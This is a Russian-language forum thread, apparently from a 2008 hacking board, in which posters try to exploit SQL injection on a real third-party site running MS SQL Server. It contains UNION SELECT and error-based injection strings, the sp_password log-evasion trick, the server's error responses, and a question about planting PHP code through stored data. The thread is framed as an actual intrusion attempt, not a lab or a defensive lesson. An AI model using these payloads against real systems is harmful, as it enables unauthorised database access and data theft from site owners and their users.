Чего-то мне последнее время кривые инъекции попадаются )))
-1+union+select+1--
Incorrect syntax near '1'.
-1+union+select+null--
Incorrect syntax near the keyword 'null'.
Чего оно хочет? O_o
Order by .. к примеру работает.
И еще -1+or+1=(select+user)-- выводит все верно, а вот если к примеру -1+or+1=(select+xxx+from+xxx)--
Incorrect syntax near the keyword 'from'.
------
Подкиньте пару вариантов как это одолеть ))
-1+or+1=(select+max(table_name)+from+qwqw)--sp_password
An aggregate may not appear in the WHERE clause unless it is in a subquery contained in a HAVING clause or a select list, and the column being aggregated is an outer reference.
Как его именно юзать? Можно примерчик?
С top разобраться я как понял можно
Но еще кое-что
Incorrect syntax near the keyword 'from'.
Ладно хрен с ним с этим ресурсом. Отложу на время. Видимо там скрипт замысловатый. Угадать какие параметры и где вмазать пока увы не могу. Но по простой схеме инъекций там никак.
мне нужно задать свойство unique первичному ключу в таблице.. инными словами при создании таблицы с помощью оператора create задать первичному ключу свойство unique. как теперь его добавить? )
Последний раз редактировалось sabe; 20.12.2008 в 02:28..
вопрос такой) sql inj я могу выводить данные из базы) могу править данные которые могу потом вывести) если добавить в таблицу запись <?php phpinfo(); ?> а потом вывести ее на страничку то он не выполняется(( а должен?)